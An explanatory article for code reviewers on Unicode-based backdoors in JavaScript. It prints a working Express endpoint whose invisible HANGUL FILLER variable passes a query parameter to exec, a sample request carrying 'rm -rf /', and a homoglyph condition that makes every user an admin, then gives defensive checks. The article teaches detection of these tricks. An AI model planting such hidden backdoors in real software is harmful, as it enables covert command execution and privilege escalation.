A backdoor is a way to bypass normal authentication: a "secret entrance" that gives remote access to a software system without the usual checks. Backdoors are built to evade common safeguards such as code review and logging. Imagine being responsible for developing an API and quietly adding an endpoint that no one but you knows about, letting you steal user information at will.
This hidden nature is what makes backdoors so damaging: the owners of a system usually cannot tell whether one exists, or whether it is stealing or modifying data. Creating an undetectable backdoor is not easy, but once one slips past review, the damage can be severe.
As a developer, you may introduce a backdoor into the application you are building, intentionally or not, through the "extremely clever" techniques described below. As a code reviewer, you should know these techniques so that you can expose them.
The character "ㅤ" (U+3164) is called "HANGUL FILLER". It renders as blank space, which is why it is described as an "invisible" character. Unicode classifies it as a letter rather than whitespace, however, so it can be used as a variable name in JavaScript.
const ㅤ = "hello world";
console.log(ㅤ); // hello world
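The difference between "looks like a space" and "is a space" can be checked directly. The following is a minimal sketch, not part of the original example: `filler` and `fillerInfo` are illustrative names, and the character is written as the escape `\u3164` so that it stays visible in the listing.

```javascript
// U+3164 HANGUL FILLER, written as an escape so it is visible here.
const filler = "\u3164";

const fillerInfo = {
  // Code point of the character, formatted the way Unicode charts show it.
  codePoint: "U+" + filler.codePointAt(0).toString(16).toUpperCase(),
  // \s covers JavaScript whitespace; the filler is not part of it.
  matchesWhitespace: /\s/.test(filler),
  // trim() only strips whitespace, so the filler is left in place.
  survivesTrim: filler.trim().length === 1,
  // \p{L} matches any Unicode letter, which is what the filler is.
  isLetter: /\p{L}/u.test(filler),
};

console.log(fillerInfo);
```

Because the engine treats the character as a letter and not as whitespace, it can form an identifier on its own.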
Taking advantage of this property, it can be cleverly used in cases like the following.
const express = require("express");
const util = require("util");
const exec = util.promisify(require("child_process").exec);

const app = express();

app.get("/network_health", async (req, res) => {
  const { timeout, ㅤ } = req.query;
  const checkCommands = [
    "ping -c 1 google.com",
    "curl -s http://example.com/",ㅤ
  ];

  try {
    await Promise.all(
      checkCommands.map(
        (cmd) => cmd && exec(cmd, { timeout: +timeout || 5_000 })
      )
    );
    res.status(200);
    res.send("ok");
  } catch (e) {
    res.status(500);
    res.send("failed");
  }
});

app.listen(8080);
At first glance, this is an API with a single endpoint, /network_health. When called, it runs two commands, ping and curl. Take a moment to see if you can spot anything unusual in the code snippet above.
Look at the destructuring assignment at the top of the handler:
const { timeout, ㅤ } = req.query;
There seems to be something after the timeout variable. Yes, it is the "HANGUL FILLER" character. The attacker is declaring a second variable whose name is the "HANGUL FILLER" character, filled from the query parameter of the same name.
Now look at the last entry of the checkCommands array. The line appears to end after the trailing comma, but the "HANGUL FILLER" variable follows it as a third array element. So if req.query contains a "HANGUL FILLER" parameter, its value is executed as a command.
A query to the endpoint with the backdoor might look like this:
GET - /network_health?%E3%85%A4=rm%20-rf%20%2F
In a more readable form, it is equivalent to:
GET - /network_health?ㅤ=rm -rf /
This means that the command rm -rf / is executed, which attempts to delete everything on the server.
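The path from query string to command list can be reproduced without running anything. The sketch below is a simplified stand-in for the handler and rests on a few assumptions: it parses the query with the built-in `URLSearchParams` rather than Express's own parser, `buildCommands` is a hypothetical helper, the payload is a harmless `echo`, and the hidden variable is spelled out as `hidden` through the escape `\u3164`.

```javascript
// The invisible parameter name, written as an escape so it is visible.
const FILLER = "\u3164";

// Hypothetical helper that mirrors the handler's logic without executing anything.
function buildCommands(rawQuery) {
  const query = Object.fromEntries(new URLSearchParams(rawQuery));

  // Same destructuring as in the handler, with the hidden name made explicit.
  const { timeout, [FILLER]: hidden } = query;

  const checkCommands = [
    "ping -c 1 google.com",
    "curl -s http://example.com/",
    hidden, // the "empty" slot after the trailing comma
  ];

  // The handler skips falsy entries via `cmd && exec(...)`.
  return { timeout, commands: checkCommands.filter((cmd) => cmd) };
}

// A normal health check: only the two expected commands remain.
const normal = buildCommands("timeout=1000");

// A request carrying the percent-encoded filler as a parameter name.
const attacked = buildCommands("timeout=1000&%E3%85%A4=echo%20pwned");

console.log(normal.commands);
console.log(attacked.commands);
```

With the second request, the attacker-supplied string becomes a third entry in the list that the real handler would pass to exec.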
A homoglyph attack uses Unicode characters that closely resemble other characters, such as operators. The result is code that looks like an ordinary logical operation but does something else.
const [ENV_PROD, ENV_DEV] = ["PRODUCTION", "DEVELOPMENT"];
const environment = "PRODUCTION";

function isUserAdmin(user) {
  if ((environmentǃ=ENV_PROD)) {
    return true;
  }
  return false;
}
The isUserAdmin function is meant to decide whether a user is an admin based on the environment variable. If environment is not "PRODUCTION", then everyone is assumed to be an admin.
The idea is sound, but look at the if condition:
if ((environmentǃ=ENV_PROD)) {
Here the character "ǃ" is not the "!" of the != operator. It is the Unicode letter U+01C3 (LATIN LETTER RETROFLEX CLICK), which closely resembles the exclamation mark. Because it is a letter, it becomes part of the identifier, so the condition is no longer a comparison but an assignment to a different variable: environmentǃ = ENV_PROD. The assigned value, "PRODUCTION", is a non-empty string and therefore truthy, so the if condition is always true, and all users, regardless of the environment, are considered admins.
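The effect of the disguised assignment can be observed in isolation. The sketch below is an illustration under stated assumptions, not the article's code: the function bodies are compiled with `new Function` so that one runs as sloppy-mode code and the other as strict-mode code, the names `isUserAdminSloppy` and `isUserAdminStrict` are hypothetical, and the look-alike is written as the escape `\u01C3`.

```javascript
const ENV_PROD = "PRODUCTION";

// The condition from the example; "\u01C3" puts the look-alike letter into the source text.
const body =
  "if ((environment\u01C3 = ENV_PROD)) { return true; } return false;";

// new Function compiles sloppy-mode code unless the body opts into strict mode.
const isUserAdminSloppy = new Function("ENV_PROD", body);
const isUserAdminStrict = new Function("ENV_PROD", '"use strict"; ' + body);

// Strict mode first: assigning to an undeclared variable throws.
let strictError = null;
try {
  isUserAdminStrict(ENV_PROD);
} catch (err) {
  strictError = err;
}

// Sloppy mode: the assignment silently creates a global and yields a truthy string.
const sloppyResult = isUserAdminSloppy(ENV_PROD);

// Remove the implicit global created by the sloppy call.
delete globalThis["environment\u01C3"];

console.log(sloppyResult);
console.log(strictError && strictError.name);
```

In strict-mode code (which includes ES modules) this particular trick fails loudly, because the look-alike variable was never declared. An attacker could still declare it somewhere else, so strict mode narrows the attack rather than removing it.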
Many other characters resemble characters used in code and can be abused in the same way. For example: "／", "−", "＋", "⩵", "❨", "⫽", "꓿", "∗". Unicode calls these characters "confusables".
Using Unicode to create backdoors is not a new idea. These tricks are compact, confusing, and easy to overlook, which is why you need to know they exist and stay vigilant.
Keep these tricks in mind when reviewing code from unknown or untrusted contributors. This is particularly relevant for open-source projects, which often receive contributions from "completely unknown" developers.
If possible, restrict source code to the ASCII character set; many development teams already use English as their primary development language. Set up tooling that warns about code breaking this rule to limit these types of attacks.
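As one way to enforce an ASCII-only rule, a small check can run before review or in CI. The sketch below is a minimal example and not a complete linter: `findNonAscii` is a hypothetical helper that reports every character above U+007F with its line and column, and a real project would need to allow legitimate non-ASCII text such as translated strings.

```javascript
// Report every non-ASCII character in a piece of source text.
// Lines and columns are 1-based; columns count UTF-16 code units.
function findNonAscii(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, index) => {
    let column = 1;
    // for...of iterates by code point, so surrogate pairs stay together.
    for (const ch of text) {
      const codePoint = ch.codePointAt(0);
      if (codePoint > 0x7f) {
        findings.push({
          line: index + 1,
          column,
          codePoint:
            "U+" + codePoint.toString(16).toUpperCase().padStart(4, "0"),
        });
      }
      column += ch.length;
    }
  });
  return findings;
}

// The two suspicious lines from this article, with the hidden characters
// written as escapes so they are visible here.
const sample = [
  "const { timeout, \u3164 } = req.query;",
  "if ((environment\u01C3=ENV_PROD)) {",
].join("\n");

const findings = findNonAscii(sample);
console.log(findings);
```

Run against the examples in this article, the check flags both the invisible variable name and the look-alike exclamation mark, which is exactly what a reviewer's eyes tend to miss.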
VS Code added Unicode highlighting in the 1.63 update, which flags invisible and confusable characters: https://code.visualstudio.com/updates/v1_63#_unicode-highlighting.
The Unicode Consortium is also forming a task force to investigate source code spoofing issues: http://blog.unicode.org/2022/03/avoiding-source-code-spoofing.html.